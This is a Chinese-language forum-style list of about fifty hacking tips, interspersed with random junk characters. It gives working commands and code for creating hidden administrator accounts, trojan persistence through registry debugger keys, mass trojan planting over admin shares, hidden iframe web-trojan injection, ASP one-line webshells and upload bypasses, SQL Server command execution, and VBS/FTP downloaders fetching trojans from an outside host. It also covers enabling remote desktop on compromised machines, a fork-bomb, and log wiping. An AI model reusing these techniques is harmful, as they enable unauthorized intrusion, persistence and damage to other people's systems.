1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( T7 }) H3 ?, k4 p$ ]8 }$ T, J
cacls C:\windows\system32 /G hqw20:R% U6 q# w1 ^! h
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入8 ~- g4 s5 j& _. K, r! r3 l, U& s
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
! Y7 Y; K3 B! c7 Q) E
8 z6 y+ ~! H, d# u+ W2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
$ Q& Z8 b4 U# }# D8 J$ E# k. I1 O: c* t1 W- `: O% F
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
1 Q( a4 t8 ~9 c1 I
7 A2 D8 B7 ~" r" @8 M/ |( z: H4 e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ v, ~5 k0 {; K0 j. n) J$ G9 k
$ M+ s5 B. F; I8 p3 m3 X- S4 R0 N% Q5、利用INF文件来修改注册表
0 u- |5 i& b* x- ?# l' I7 K[Version]
# d- X. O& N2 u" x6 PSignature="$CHICAGO$"+ `* F! u) l" V9 F5 h, b1 ?+ x
[Defaultinstall]2 c7 `/ H* A) u( Y% d. E) k! x
addREG=Ating
, @$ D7 P; O) k B[Ating]
, R* l# G N: V8 D9 Q" t0 a5 NHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
0 W7 ?8 V- D7 W; G& V+ |, v% ~以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:( ?+ j+ J2 S2 w6 }
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径/ i% ^3 T4 v! l( w
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU) D. `+ O% G8 ?0 ]+ ]7 B, m3 k
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU2 J0 t9 l/ a' |, @9 M6 N
HKEY_CURRENT_CONFIG 简写为 HKCC
$ G& j4 D8 k0 [7 `0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值2 ~* N L& c& @- p
"1"这里代表是写入或删除注册表键值中的具体数据' { ~- t: E' Z( j1 h- B
9 G7 `$ K6 A0 s; t; `9 f9 r/ Y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
2 C" J' v) s; O/ n多了一步就是在防火墙里添加个端口,然后导出其键值
, J/ u+ ~8 }& E' X9 [( m[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List], d3 J: `, E1 R' {: |' d; ?
0 K3 n* F9 R8 B: \1 K2 D' Q& i$ [# ~7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
- G R' y* Y* V& B3 n1 H. y. j# U在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。7 o" D$ C3 K0 T" H7 m+ z
) a( l3 i9 _ ]5 w( `3 ]8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ z/ d) c3 p5 H4 }. e0 e3 m
$ u+ V: L1 i. ]6 D' I7 v- F9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
D. M" P% [7 N S4 a' d9 A6 \# [可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
* d3 R6 M& ^+ o% K& M- C
/ u( u5 a8 d: M" D0 F7 k, L# s& c10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 `) D4 Z1 S' d; V4 D* M1 @! V& W9 p+ Q
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
4 l8 y* {- t* V* L u8 w用法:xsniff –pass –hide –log pass.txt# e4 l4 {4 U. O, k, h' A- p
6 t9 {* A4 I8 ~3 Z12、google搜索的艺术) I7 C' l3 z; W3 o
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 H' G/ a: j m% \. I1 }或“字符串的语法错误”可以找到很多sql注入漏洞。
6 j* [. f: I8 o, I5 e9 C' K+ ?: s$ u: K
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
, c1 V, ~6 |6 O5 P- S( N8 B$ h" I& [6 X0 o5 \
14、cmd中输入 nc –vv –l –p 1987
4 G' a% a7 Y' ^) J |做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃# T, F# ]6 D) N
+ S* q8 H0 ]; a) e5 N1 e15、制作T++木马,先写个ating.hta文件,内容为7 K4 V3 }/ [1 O4 q. R
<script language="VBScript">* L3 Q' H1 p( h/ s* R! Y
set wshshell=createobject ("wscript.shell" )
/ n, M( m( ?/ Oa=wshshell.run("你马的名称",1)' t& M$ p+ I/ _/ x2 O+ A
window.close7 g+ d$ d' V8 }) }2 B6 M
</script>
) J8 ?2 t5 k3 T) h+ N+ q2 G6 J. l再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 Z6 ? i: m# Q
1 q3 w0 T* f" F" y+ f" R# `8 b0 R16、搜索栏里输入
# y0 ]4 s& K7 ]. m9 `) ?关键字%'and 1=1 and '%'='' X) m3 X' e0 C
关键字%'and 1=2 and '%'='. p1 F8 d8 j# i' f K
比较不同处 可以作为注入的特征字符- @- t! H) A, Z1 t/ v
' {( ?8 U1 \0 t) m8 l' x
17、挂马代码<html>
0 m1 M# V7 T8 B6 o8 z& N- q<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
T- E8 y+ K$ [) a: M5 C</html>- O* O: }7 p: a& M) H4 ~1 Q
5 t5 I+ k' S* r' H, d2 F18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
7 y G& ]5 p5 G$ g4 Z) W# `net localgroup administrators还是可以看出Guest是管理员来。+ v& @9 `; o9 c) |0 j' l. o) I, {
# z+ C4 A% ~5 X: i8 I
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
{% G# A W; F3 d/ n用法: 安装: instsrv.exe 服务名称 路径+ s3 y6 M0 V/ u. y- `0 E
卸载: instsrv.exe 服务名称 REMOVE2 V) K+ [) m5 h
. U1 g* h0 l4 L+ j7 e
$ I o6 C' g) I; K21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
4 q( A" b1 \! g6 N0 z不能注入时要第一时间想到%5c暴库。' ]; r9 P; R* Z$ G9 H+ L2 Z, E9 \
4 d2 N9 V: q. A7 q( H8 Q4 ?
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
% w e: U$ { a' T* a7 j* m( ]2 A: v- }8 s8 f3 B
23、缺少xp_cmdshell时
4 F4 c' _3 B2 W尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'" _( z$ [( H$ a, T* u' K: b# d
假如恢复不成功,可以尝试直接加用户(针对开3389的): p; s9 ?) A4 w2 j, `
declare @o int
; n, T H0 \" M8 y& }+ x2 A4 Iexec sp_oacreate 'wscript.shell',@o out/ F$ ~; v$ U6 Z3 s
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员! y2 X, {( O6 a' O+ [ P
! |, c& s9 Q, o24.批量种植木马.bat( B, ^/ W$ H) K6 L
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 h" e5 B" M1 b$ R4 pfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 `% ?$ ?$ k3 w; ^1 g M( [扫描地址.txt里每个主机名一行 用\\开头) Y: x* ?6 i5 {6 q1 s: |" b+ u
A! t0 j- R& g
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。) E6 u! V# c2 u# z
1 |' b- ?- R7 c; V% G( z+ m3 A26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
# Q2 x) C( p E8 i8 ]9 `将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ V0 K: Y# g* K; R8 {- ~3 s1 e
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
. G; p1 ^+ V$ C q5 Y: l5 Z: w0 r( R) N u1 h9 |$ O; r0 \
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 l; p3 L" R" u然后用#clear logg和#clear line vty *删除日志
; T6 S3 {3 R6 G" r1 G- o% g, X5 x
28、电脑坏了省去重新安装系统的方法
: o8 P2 C# R0 y. A& T6 I纯dos下执行,
! R# `5 B! a5 Rxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
0 A4 A- c! F3 r; ~: r2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config* F2 \+ b: M$ Q
2 w4 f. C0 {9 `2 `: N0 y29、解决TCP/IP筛选 在注册表里有三处,分别是:& E" }, I, e8 r- a: a8 c) b+ k
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 a$ @% H1 @, J9 ]; I- [
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( E( w3 w2 ~" r0 Y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 p! Q7 M* L. t! {" a( c
分别用
! @; p2 H" |* v9 p# ` nregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 g* A" l+ M, @ ~regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# Y* i/ c: W( G# k3 |regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; _5 ]& V7 J% `7 n( z% Y命令来导出注册表项* |" f5 e+ _+ R. f2 @: C$ K
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 c6 X1 M, i; w改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. J7 l; f2 a! E4 Y# K: W; Xregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
+ h1 t$ s& a" P$ `/ \8 L7 C) v- b u# K& J/ a
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 G. ~* y5 A% K7 Z/ K$ T J; I
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的35 S1 w a R( M/ F9 G* o# b8 `
' j0 ~2 `( c8 F. n/ X31、全手工打造开3389工具# |9 ~& k$ F6 ?, A: m% s& Y: |
打开记事本,编辑内容如下:
/ c1 H* S3 F; a1 `echo [Components] > c:\sql/ o3 x1 |# O& U! t
echo TSEnable = on >> c:\sql
9 O' B% q' T+ nsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
?: t0 W0 C5 C) k编辑好后存为BAT文件,上传至肉鸡,执行, a) _) l% L; o9 s2 f, p$ G/ F( L
0 V' @" v9 K% r# [7 B& s32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马$ s7 B# C6 ?/ K) z! q5 i/ E
2 _9 R! L1 @6 f% T1 s: V. j33、让服务器重启
% c1 f. B3 O) _% r写个bat死循环:
; R G7 `7 X) b o( J4 S@echo off5 u3 n- v# m( d) K4 U1 N
:loop1
9 ^+ n. A$ r9 B& k# [' fcls0 e# I& J( J1 o Z0 t# o* H. q
start cmd.exe3 o- o: K) I i/ s0 z& x
goto loop19 c' t$ C3 X9 I9 h, |1 X! f1 X
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启. I; S: F* a+ Q* Y
1 h! B& s8 J; w0 ?34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,9 s) C' p( |5 C9 A
@echo off! X8 X8 a3 y+ Y* C* Q0 n' [4 d9 b
date /t >c:/3389.txt
; L- s. E; |" d1 ^( T5 j4 ytime /t >>c:/3389.txt
) H& Y' E; \8 L3 Dattrib +s +h c:/3389.bat
+ n0 q1 e7 a0 P. j5 kattrib +s +h c:/3389.txt
* {) k$ J" V( t4 gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ b J$ d; o$ J/ T! H3 i并保存为3389.bat
; S0 b* @0 J2 @( F: \2 K% J: O打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
7 p) B8 A) e+ }3 K& ]5 I+ I. j; U9 ?. i1 g L; l: Z, @
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, a& q }. i3 Ystart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
$ h# g2 @4 ?+ f! Q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
* b9 J {3 ~" |* k" E$ x B
: F+ f5 }4 u1 j' Z$ |0 ?3 ^36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件" `1 W% h1 F+ q) h4 ]8 o6 [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 I8 [& `" [% u1 o5 ~
echo 你的FTP账号 >>c:\1.bat //输入账号0 t# `& c! q) t* `$ A
echo 你的FTP密码 >>c:\1.bat //输入密码
/ k2 O+ A( Z. R9 J. b* o4 m8 Secho bin >>c:\1.bat //登入9 w3 N. _' {$ _
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
: _! l5 e# L& n& \" V, Lecho bye >>c:\1.bat //退出
$ d! L V3 Y1 P/ h; r+ K4 Y7 @' Z, N然后执行ftp -s:c:\1.bat即可
. o1 p k8 L g- p& ]0 y
& K6 p- @, L# k8 o; k37、修改注册表开3389两法* s# Q1 B8 O E$ c2 ?$ l
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
) O4 w' B2 y p+ T# c& ^echo Windows Registry Editor Version 5.00 >>3389.reg
3 A% Y. V" q" |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 m% T, c/ O' jecho "Enabled"="0" >>3389.reg& L& F; |, c9 v6 k# D" p* F
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
% I3 ^1 A9 M2 R4 MNT\CurrentVersion\Winlogon] >>3389.reg
% p0 q8 e3 v$ v9 e7 Hecho "ShutdownWithoutLogon"="0" >>3389.reg* _' H% T& {% c( y/ _ z) ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# ^/ \1 b1 M6 \0 s+ d- [
>>3389.reg
9 L; `3 z4 F! n' i& M) h2 ]. p' Iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
- v9 d2 T: w& }! h. qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 ?0 C6 L# V6 y9 C7 Q* P% u>>3389.reg
, m% ^, G }5 P" J; b8 g* Z9 recho "TSEnabled"=dword:00000001 >>3389.reg8 s( Z! p; I$ _0 W: ?2 O n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
" B5 v8 a% [/ t- x6 Jecho "Start"=dword:00000002 >>3389.reg4 t6 Y$ R' @9 {# E2 a9 p% ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
% K3 m; Z- k, ^( A# p8 I1 c3 d>>3389.reg
- j0 v3 B9 G: N$ w/ F$ ?$ ?3 I2 P: aecho "Start"=dword:00000002 >>3389.reg- l6 m7 j1 k2 a! z
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 [0 A9 c9 r8 C; ]; V: q
echo "Hotkey"="1" >>3389.reg( d) z3 |: }) ?$ Z. G$ O2 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: }. m7 }. Q! j3 `7 q- F/ E3 J. e
Server\Wds\rdpwd\Tds\tcp] >>3389.reg$ t4 f+ E3 @+ J1 I5 F- a0 ?( a
echo "PortNumber"=dword:00000D3D >>3389.reg* G8 F4 }1 x8 x _$ X& p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 \' ]8 B) u- D1 E/ [* S" bServer\WinStations\RDP-Tcp] >>3389.reg( r" [, }- A3 T
echo "PortNumber"=dword:00000D3D >>3389.reg. ]1 {) P' R9 j9 K( f, |6 ^ o
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。! C e5 L* u: Z l
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
) U4 J8 b% E6 Q" |/ a因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效( Q* Q; Z2 v+ N5 s' d- R
(2)winxp和win2003终端开启
& E' a) s7 T8 \! S/ R* y9 R用以下ECHO代码写一个REG文件:
/ k6 g, o/ s/ Z% W1 I: `1 f* }echo Windows Registry Editor Version 5.00>>3389.reg
- s6 C$ L" t9 ~# L# Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& S! l% X" r; `% U8 E# z& a' [Server]>>3389.reg) l7 C% M7 c% }' ?$ `
echo "fDenyTSConnections"=dword:00000000>>3389.reg, C8 s/ Y& x. d8 J1 k9 U9 C8 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& v% T* v5 @7 [, [Server\Wds\rdpwd\Tds\tcp]>>3389.reg
: c1 G8 b u( Recho "PortNumber"=dword:00000d3d>>3389.reg/ `0 u& H* k s/ m7 N" L8 j2 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 m( n# t/ Q9 X$ K) q$ r& EServer\WinStations\RDP-Tcp]>>3389.reg" p8 p# L" u3 @! g' g9 a
echo "PortNumber"=dword:00000d3d>>3389.reg- q! `" ]3 S6 d. k/ e' x
然后regedit /s 3389.reg del 3389.reg
" Q; `' x" e( T* N# pXP下不论开终端还是改终端端口都不需重启
1 D. q# z' L2 R9 t0 q- f% `% G4 h+ o7 z$ }( r
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 e# Y' H6 s- Y8 [* V6 G7 T5 G用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
: S9 ^+ ~. n) y3 R8 q! N1 z. D* }, y h9 }( N7 D
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: s% b6 j' b* \. Y& V
(1)数据库文件名应复杂并要有特殊字符. g5 V! \4 a: S5 V1 E# f5 F$ Q; D" f
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源9 }' H& Q1 ~* s9 v
将conn.asp文档中的
% o( ^% N6 o o3 CDBPath = Server.MapPath("数据库.mdb")% _! X' k: z& V, |7 W% s- S/ t: x
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" C- B7 ?* b; _7 c2 ]: r1 X) Q
! O5 O0 t1 w" L- G" C, K
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置, B8 W3 H6 N v. }7 {! o& _+ I0 c9 @" l
(3)不放在WEB目录里9 m7 E1 a6 {/ O$ d
2 n h, x4 m" ]! x: C4 I5 s% ^40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ _- d$ p j5 ^可以写两个bat文件4 |: y' C7 t0 r
@echo off! r' {9 v* P+ O( f
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
: L& C& V6 f9 r1 A6 ]6 ?. e@del c:\winnt\system32\query.exe9 F' v( s1 q* f5 a
@del %SYSTEMROOT%\system32\dllcache\query.exe) B9 Y/ u8 e8 ^/ p5 C) V4 |: S
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, z0 _% |$ m. V+ W6 j( z8 s: G- S' B5 g
@echo off
! p2 m# k' N8 \@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! x9 \( M* l( T% S
@del c:\winnt\system32\tsadmin.exe
2 V8 |# Z* X8 D, X7 F4 N@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 T+ m2 Y9 C- E4 e8 r% D
+ l* r) w; X3 C1 _8 E41、映射对方盘符
( [4 z% j) k6 H+ E$ Ntelnet到他的机器上,; U" G7 l5 A; w. N+ C4 N8 V
net share 查看有没有默认共享 如果没有,那么就接着运行: M3 U/ h% O! [: z+ s4 @
net share c$=c:. q9 D W, h' L4 k
net share现在有c$7 ]; d% a3 e, l( W; ?
在自己的机器上运行
$ j1 e3 ~0 o2 K5 D6 knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 {& n5 H* h& y+ p6 {) T7 o2 `
42、一些很有用的老知识5 {0 g8 ?' ?8 k
type c:\boot.ini ( 查看系统版本 )) s+ ^9 J' i0 c5 `
net start (查看已经启动的服务), M3 J1 U/ l8 ~
query user ( 查看当前终端连接 )
! B0 m/ n, }) lnet user ( 查看当前用户 )
$ c# _4 m9 T* Z- o; mnet user 用户 密码/add ( 建立账号 )9 z ]$ {6 p5 K) q9 G0 Q& G
net localgroup administrators 用户 /add (提升某用户为管理员)
; z0 Z3 A9 W" c4 ^2 }9 d7 [ipconfig -all ( 查看IP什么的 )
* O: ]( e: G) [netstat -an ( 查看当前网络状态 ). w Y0 l7 c- S4 s* x: ~0 H7 I
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 |6 S6 y' R+ t3 z( h% {, B( P克隆时Administrator对应1F4! P& J# R" N; u3 @3 N. a6 E
guest对应1F5; H6 c4 w$ J. @4 f* X
tsinternetuser对应3E8
% z& U& l- d* }+ e1 t
. t, v5 }4 f: ^43、如果对方没开3389,但是装了Remote Administrator Service) I* ]" D% v, i7 a
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接' ]7 n0 w: L2 u R! [7 w3 _- v
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 L: l/ k! z7 @4 F先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin": w1 W* z6 H1 f6 H) k: R) D
6 E, G( m M' U, u7 _6 B
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
# M. n' L8 @" N! g2 S$ j8 I本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
, C. O' n0 E6 _& `$ K3 c0 ]1 b! ]! S5 t" i& q6 b5 {9 X
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)+ U- h% |' @+ r/ J/ O; t
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open. q( O3 f# U$ S% r: T7 T
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
& o% Y* K3 x p+ W" B- {9 tCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
: v/ {, G6 S( q) Y1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs! P, q# {3 S2 m3 g3 ]
(这是完整的一句话,其中没有换行符)5 x$ Q! W; P9 z% `$ i/ b$ n
然后下载:
8 ?% t/ d- h2 ^* K' @6 Hcscript down.vbs http://www.hack520.org/hack.exe hack.exe0 g8 V4 F6 r7 F, j0 }/ ^9 {( z0 W
. M# B8 P% p* G46、一句话木马成功依赖于两个条件:1 H8 g9 j' N4 K
1、服务端没有禁止adodb.Stream或FSO组件0 ^0 D d9 U) J1 ]5 |* O7 Z: x9 i
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。, z) l3 N, v) A8 n- E+ f; G8 e) o7 r
1 C$ h! V& c$ @, v2 g! @- O
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
# j: ]' Y5 Z9 v8 Z' @;alter database utsz set RECOVERY FULL--. e2 |! {0 o* B& a8 f: [2 B, @
;create table cmd (a image)--' ]9 q% [* ~% m5 K
;backup log utsz to disk = 'D:\cmd' with init--8 U9 M; F1 p: O; G/ y7 L" G2 \! X
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. `7 D2 w) P3 `% H4 d6 u7 Z1 V# v5 C4 L) N' S;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
" p8 x' R" Y# k# f! W! K" t注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
3 C: m4 @3 h! c3 q
/ R6 Y/ L/ C( ]48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
1 z5 e& h+ }. h7 j6 ?/ W0 Y9 c e8 m$ l* D- b
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options" s+ m" `! B3 y0 j6 T: F9 d
所有会话用 'all'。 b# q. i1 e6 ^2 G/ ]; Y
-s sessionid 列出会话的信息。
5 V4 A& M1 b. R" D* [-k sessionid 终止会话。
" ?$ G0 d. K7 n& O9 N6 s& v6 m-m sessionid 发送消息到会话。% Q+ R, o- l7 f/ @ P
8 L" r7 S9 [ F
config 配置 telnet 服务器参数。7 |! a) l2 J4 h7 A( P
2 |! t9 ^0 E: T% Z7 i! Z. u
common_options 为:
5 p# d* Q" i9 ]& C+ W-u user 指定要使用其凭据的用户7 H, H" b. P+ k5 D" b! C3 A& c& \
-p password 用户密码8 j: b' M1 F/ F" y; T
0 Y/ l; j$ y9 E. L" n! ~- d# e7 y8 |
config_options 为:
* g* ]; B3 M9 M7 B' |dom = domain 设定用户的默认域1 s& V5 P/ m, a$ u" u2 x( \! j
ctrlakeymap = yes|no 设定 ALT 键的映射
/ i1 I* M/ Z( s: _8 T* ?timeout = hh:mm:ss 设定空闲会话超时值* c2 o* t, L) F! H; z1 \
timeoutactive = yes|no 启用空闲会话。
& n% e$ p J' G$ umaxfail = attempts 设定断开前失败的登录企图数。. u7 k, G: s# H8 }
maxconn = connections 设定最大连接数。5 S) F9 L) {% i/ o8 [( R1 x; ^
port = number 设定 telnet 端口。5 ~: m( Q5 h) J# T3 O* p; J
sec = [+/-]NTLM [+/-]passwd
9 w: I7 U; M% p设定身份验证机构
& C- a+ h# F- @9 u0 Lfname = file 指定审计文件名。
! s, ]; \( l1 B+ bfsize = size 指定审计文件的最大尺寸(MB)。9 m0 _% Q1 q" s/ k6 v& S3 K! V" I- p
mode = console|stream 指定操作模式。
( j" t* u7 Z% e8 k7 h& cauditlocation = eventlog|file|both
, I$ e( @ K Z" b* T指定记录地点7 P- X- V: J# ]& F
audit = [+/-]user [+/-]fail [+/-]admin% H# C+ t/ k! f$ P8 w
8 S! t3 S, Z* v4 V8 x% J/ a( i* B49、例如:在IE上访问:
0 H" v+ j9 s4 S* R# J; cwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
~- [8 F+ f: X( P" L6 Rhack.txt里面的代码是:
2 d: E6 F/ N2 X$ R t7 K<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
- S( V U. g) A, k把这个hack.txt发到你空间就可以了!5 w1 I% j+ n1 Y9 O- ~
这个可以利用来做网马哦!( C- ?, M" I; Q+ Y& i. @# V. E3 T
V1 x# @( X+ y0 j50、autorun的病毒可以通过手动限制!
$ |! D" n* a9 Z3 I, @# U, n1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行! P& l$ Z6 K$ h- ^6 d
2,打开盘符用右键打开!切忌双击盘符~
/ j; Y+ G, |# |3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 W& R0 F) h: I, t+ B* \
3 Y2 Y9 _* A/ D# e51、log备份时的一句话木马:
7 p6 @( p$ c, `" ]# L7 [- n# Q/ Ma).<%%25Execute(request("go"))%%25>
- n8 q! e5 `) ab).<%Execute(request("go"))%>7 j& @/ _$ O9 B1 f* ~5 ?" D
c).%><%execute request("go")%><%
/ w' a$ T& G; F+ Z& h8 Rd).<script language=VBScript runat=server>execute request("sb")</Script>
: Q6 `" ` E6 ]4 J$ Ye).<%25Execute(request("l"))%25>: v. Y/ V% w. i% ^- p, m; |8 s
f).<%if request("cmd")<>"" then execute request("pass")%>4 R' M( i: |+ R- ~" ]3 I5 u& ]
